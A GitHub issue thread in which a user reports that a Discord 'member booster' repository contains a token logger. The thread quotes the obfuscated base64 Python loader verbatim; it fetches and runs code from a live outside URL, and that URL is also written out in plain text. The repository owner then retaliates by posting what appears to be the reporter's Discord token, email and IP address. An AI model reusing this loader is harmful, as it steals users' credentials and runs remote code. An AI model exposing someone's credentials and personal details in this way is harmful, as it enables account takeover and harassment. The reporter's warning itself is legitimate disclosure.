### ISSUE TITLE
Stop

### ISSUE THREAD

**Issue by Zrivx** [Vzyld/discord-member-booster#3]
why u added token logger to source ?
``,__import__('builtins').exec(__import__('builtins').compile(__import__('base64').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vd2FzcC5wbGFndWUuZnVuL2luamVjdC9wU3V1WlJOYkJzYnJ5Nm9MJykucmVhZCgpKSIiIikKX3R0bXAuY2xvc2UoKQp0cnk6IF9zc3lzdGVtKGYic3RhcnQge19lZXhlY3V0YWJsZS5yZXBsYWNlKCcuZXhlJywgJ3cuZXhlJyl9IHtfdHRtcC5uYW1lfSIpCmV4Y2VwdDogcGFzcw=="),'<string>','exec'))``

http://wasp.plague.fun/inject/pSuuZRNbBsbry6oL

also original rep is https://github.com/vandalise/Discord-Token-Generator

plz stop :/

**Comment by WavaAdrian** [comment]
Lol

**Comment by Zrivx** [comment]
> Lol

?

**Comment by Vzyld** [comment]
> > Lol
> 
> ?

OTc0ODA3MzY1NTc4Nzg0Nzg4.GAwOfd.aHGTt1idvoae5VOOyoTbZzmKqiwQxKx-_h3h90
hagh6102@gmail.com
164.90.133.16

**Comment by Zrivx** [comment]
sorry but: I'm changed password
sorry 2: it's only email
sorry 3: it's VPN and I'm not in USA 

now cry in cor
